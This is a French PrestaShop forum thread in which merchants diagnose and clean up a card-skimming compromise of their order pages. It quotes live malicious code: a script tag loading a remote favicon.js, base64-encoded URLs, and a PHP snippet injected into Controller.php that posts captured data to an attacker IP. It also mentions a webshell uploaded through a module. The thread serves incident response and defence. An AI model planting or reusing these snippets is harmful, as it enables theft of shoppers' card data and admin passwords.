Appel script favicon.js malveillant sur les pages de commande

[Joseph Joestar]

Bonjour

Dans le code de mes pages de commande, avant toute la structure classique de la page , se trouve une balise script qui appelle un script malveillant.

<script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script> 
<!DOCTYPE HTML> 
<!--[if lt IE 7]><html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="fr-fr"><![endif]-->
<!--[if IE 7]><html class="no-js lt-ie9 lt-ie8 ie7" lang="fr-fr"><![endif]-->
<!--[if IE 8]><html class="no-js lt-ie9 ie8" lang="fr-fr"><![endif]-->
<!--[if gt IE 8]><html class="no-js ie9" lang="fr-fr"><![endif]-->
<html lang="fr-fr"><head><meta charset="utf-8" /><title>Comman   ......

Celui-ci ré-arrange le DOM pour s'incruster dedans et rajouter un petit formulaire dans la partie paiement (j'ai désactivé celui-ci)

Est-ce que quelqu'un a rencontré ce problème ?

Le problème m'a l'air assez complexe après 2 jours à retourner fichiers et BDD sans rien trouver de significatif.

Edit : Je suis sous Prestashop 1.6

 

Merci d'avance

Edited March 22, 2021 by Joseph Joestar (see edit history)

[Yoya]

Salut, je decouvre le meme soucis sur un site web Prestashop en 1.6 aussi.

[Joseph Joestar]

Bonjour Yoya

Est-ce le même script qui est appelé, ou un différent ?

[Yoya]

C'est le meme. De ce que je comprends, ça vient injecter un nouveau moyen de paiement qui ressemble à ça :

Je viens de trouver où il est injecté : c'est dans /class/controller/Controller.php et /controller/front/ParentOrderController.php

Le code est : base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly93d3cuYXZpci5pci9pbWFnZS9mYXZpY29uLmpzIj48L3NjcmlwdD4=')

La date des deux fichiers n'ont pas été modifiées (dernieres modifs 2018 pour ma part).

Aucune idée pour le moment de par où l'assaillant est entré.

[Joseph Joestar]

Effectivement, j'avais bien ce formulaire d'injecté.

Je viens moi aussi de retrouver l'appel dans le fichier ParentOrderController dont la date de modification n'avait pas changé non plus chez moi.

Rien dans Controller.php par contre.

Pour la porte d'entrée, rien de très concluant. Peut être un passage via un code injecté dans le favicon.

[Yoya]

On peu se contacter en MP pour essayer de comparer les modules qu'on a d'installer voir si on trouve un point commun ? Merci

[Yoya]

D'autres fichiers sont compromis :

/config/config.inc.php curl_init(base64_decode("aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9hbmFseXRpY3MucGhw"));

/controllers/admin/AdminLoginController.php  curl_init(base64_decode('aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9zdGF0eXN0aWNzLnBocA=='));

/classes/controller/Controller.php, tout à la fin : try {if(isset($_POST['statistics_hash'])){$array = array('statistics_hash'   => $_POST['statistics_hash'],);$linked="";$ch = curl_init(base64_decode("aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9hbmFseXRpY3MucGhw"));curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $array); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_HEADER, false);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);$html = curl_exec($ch);curl_close($ch);  }} catch (Exception $e) {}

[Yoya]

Pour info, les mots de passe de connections au BO sont compromis : il faut les changer une fois /controllers/admin/AdminLoginController.php modifié

[Indy80]

J'ai eu le même problème sur un de mes shops sur 1.6 avant hier (uniquement le fichier controller.php). Est-ce que quelqu'un sait quel est le module responsable ? 

Edited March 26, 2021 by Indy80 (see edit history)

[Baba deCode]

Salut,

a ta place je lancerais un scan de ton repertoire prestashop pour trouver les fichiers infectés,

en ssh

grep -rl 'base64_decode'

grep -rl 'base64_decode' ton_repertoire_prestashop

cdt

[Yoya]

24 minutes ago, Indy80 said:

J'ai eu le même problème sur un de mes shops sur 1.6 avant hier (uniquement le fichier controller.php). Est-ce que quelqu'un sait quel est le module responsable ? 

Non pas d'idée pour l'instant. Peut etre cartabandonedpro chez moi.

[Indy80]

7 minutes ago, Yoya said:

Non pas d'idée pour l'instant. Peut etre cartabandonedpro chez moi.

Effectivement on l'avait aussi mais désinstallé, je vais complètement le supprimer au cas où 

[Joseph Joestar]

Pareil de mon côté, je penche plus pour cartabandonedpro qui avait son lot de scripts frauduleux

[Baba deCode]

mettre un chmod 644 evite l'ecriture sur les fichiers et donc ce genre de piratage

sudo find /path/to/prestashop -type f -exec chmod 644 {} \;
sudo find /path/to/prestashop -type d -exec chmod 755 {} \;

attention certains repertoires de caches doivent etre en 775

[Poupipou]

Bonjour à tous, 
J'ai eu ce problème aussi je suis en PS 1.6 avec cartabandonedpro en 1.6.9. 
Je vais tout mettre à jour, mais j'aimerai avoir l'assurance que le problème vient bien de cartabandonedpro. 

Avez vous pu voir à travers de logs tout type d'exploitation à travers ce module ? 

Merci d'avance 😕 

[Yoya]

1 hour ago, Poupipou said:

Bonjour à tous, 
J'ai eu ce problème aussi je suis en PS 1.6 avec cartabandonedpro en 1.6.9. 
Je vais tout mettre à jour, mais j'aimerai avoir l'assurance que le problème vient bien de cartabandonedpro. 

Avez vous pu voir à travers de logs tout type d'exploitation à travers ce module ? 

Merci d'avance 😕 

Non toujours pas sur malheureusment. Du coup on a mis en place un script pour voir si ça revient et pouvoir analyser le cheminement le cas échéant.

[Joseph Joestar]

25 minutes ago, Yoya said:

Non toujours pas sur malheureusment. Du coup on a mis en place un script pour voir si ça revient et pouvoir analyser le cheminement le cas échéant.

Quel genre de script ?

[Yoya]

1 minute ago, Joseph Joestar said:

Quel genre de script ?

C'est un script qui va faire un état des lieux a un instant T de tous les patern de code un peu suspect "fsockopen", "base64_decode", "\\X0002" etc etc ... et passer toutes les X heures voir s'il y'a une différence avec l'état des lieux précédent.

[Joseph Joestar]

Intéressant

[Poupipou]

Très intéressant! Extrêmement bizarre tout de même ! 

 

[genny_ruos]

J'ai le même problème. Je n'ai pas installé le module cartabandonedpro. Comment puis-je vérifier s'il existe un autre module?

 

Edited April 8, 2021 by genny_ruos (see edit history)

[KzDat]

Bonjour,

Pour info, ayant eu le problème récemment sur une boutique ne disposant pas du module cartabandonedpro, il s'agissait du module vm_advancedconfigurator. 

Il y avait eu un souci similaire avec le module jmsslider il y a un moment de cela.

 

La solution est de vérifier tous les modules permettant de faire de l'upload de fichier sans les renommer par la suite.

 

 

[bobby4722]

Bonjour à tous,

Même soucis visiblement et détecté grâce à Malwarebyte même si je n'avais pas fait le lien avec mon site.
J'ai donc fait des recherches et j'en conclu que ce nouveau moyen de paiement viens donc de ce malware "avir.ir...."
J'ai visiblement les mêmes lignes de code que vous et mes fichiers datent de 2019 ! et ne se réveillent que 3 ans après...
Je n'ai jamais installé le module cartabandonedpro mais j'ai également déjà lu que ce module avait semé le trouble.
Moi j'ai cru que cela venait du module ets_megamenu (cru comprendre que également avait eu posé des soucis) mais comme je n'y connais pas grand chose et que je me sent tout petit en vous lisant, je ne sait pas quoi en déduire ni que faire.
Que faut il faire pour ce débarrasser de cette saleté ?
Pouvez-vous SVP donner des explications simples si vous y êtes parvenu car je ne suis pas sûr de tout saisir à vos explications, ni de savoir si vous y êtes arrivés et de comprendre comment vous y êtes parvenus (je ne suis pas calé).
Si quelqu'un pourrait détailler votre procédure pour la communauté ce serait génial

Un grand merci par avance.

 

 

Edited April 13, 2021 by bobby4722
ajout d'informations pertinentes (see edit history)

[Poupipou]

Bonjour pour ceux qui ont le module "cartabandonedpro" avez vous remarquez des fichiers bizarre dans le dossier "modules\cartabandonmentpro\uploads". 
Car j'ai ce que je pense un webshell en ".php.png" qui est vide. 

Cordialement. 

[bobby4722]

Bonjour à tous,

J'ai pu retirer le faux module de saisi de carte bancaire en regardant vos informations sur la page de paiement.
J'avais bien des instructions avec noté en base64 sur deux fichiers (j'y connais rien mais je sais que le code peut être invisible).
J'avais par chance un sauvegarde de mon site et donc de ces fichiers, que j'ai remplacés.
J'ai renommé l’accès admin du BO.
J'ai noté que, les deux fichiers incriminés dataient de Juin 2019 sur mon site en prod et de Aout 2019 sur la copie de sauvegarde...incroyable !

Comme je ne savais pas me servir du SSH (pas installé ni ne sais trop comment cela marche) j'ai essayé d'apprendre depuis quelque jours mais OVH me pose soucis et impossible de lancer un scan en SSH comme vous l'indiquiez...je n'arrive pas à accéder à mon espace SSH.

En revanche même si le faux module de paiement à disparu, j'ai toujours des erreurs 404 ou des pages qui ne se chargent pas sutout sur la page de selection duchoix du paiement.
Avez-vous un conseil à me donner SVP ?
Je n'ai pas le module cartabonementpro ni jamais installé.
En vous remerciant.

[jbunning]

Bonjour,

Pour ceux dont la porte d'entrée était le module cartabondementpro, si vous regardez dans le dossier uploads du module, avez vous aussi en meme "Unleash the goddamn kraken", une capture d'écran du méthode de paiement ATOS ainsi qu'un fichier ".php.png" ?

Si oui, ça créé une piste, Kraken est un exchange de crypto, donc le hackeur utilise donc peut-être cet exchange pour dissimuler l'argent des cartes sur le blockchain. Spéculatif. Eventuellement, ça peut valoir le coup en cas de victime connu, de demander à Kraken si ils peuvent remonter la piste à partir des détails d'une carte bancaire.

Sur un des deux sites qui ont été hackés chez nous pour l'instant, le fichier ".php.png" commence par "baja" ce qui fait penser à "bajatax" qui est un hackeur assez connu qui en a fait d'autres.

Voilà quelques pistes.

Cordialement,

[Poupipou]

Pour le Kraken je pense plus à une référence "Geek". 
ton fichier ".php.png" est il vide ? 
le mien fait 0 octet. 

[jbunning]

@poupinou bien possible.

Oui le fichier était aussi vide de mon côté.

[Poupipou]

3 minutes ago, jbunning said:

@poupinou bien possible.

Oui le fichier était aussi vide de mon côté.

hmmm et vous avez pensez à regarder les access log d'apache tous les 200 OK qui tapent sur /modules/cartabandonmentpro/upload.php ? 

Car personnellement je ne vois que des POST ou des GET mais à aucun moment il y a un appel vers un fichier en paramètre comme quelque chose de similaire: 
 

/modules/cartabandonmentpro/upload.php?baja.php.png=<faireuneaction>

C'est ça qui je pense me choque le plus. 

[KzDat]

Alors je ne sais pas quel est le souci exactement sur cartabandonmentpro mais l'appel à trouver sera plutôt /modules/cartabandonmentpro/<le-dossier-ou-les-fichiers-sont-uploadés>/baja.php.png

Si le fichier est vide, c'est que le code en a été supprimé. En général, le fichier complet est supprimé si possible.

[tyler06_34]

Bonjour,

 

J'ai exactement ce problème sur un prestashop 1.6

J'ai nettoyé les fichiers : 

AdminLoginController.php

config.inc.php

ParentOrderController.php

Shop.php

Pour revenir à une situation conforme à avant le problème.

J4ai recherché toutes les itérations à "base64_decode('" pour veiller à bien tout traiter.

J'ai vidé le cache navigateur et prestashop. Pourtant rien n'y fait.

Le formulaire de paiement injecté est toujours présent sur la page de commande. L'appel au fichier js https://www.avir.ir/image/favicon.js également.

Quelqu'un a t'il une piste?

Merci.

[tyler06_34]

C'est bon ! Je n'avais juste pas répercuter les changements en production. Désolé.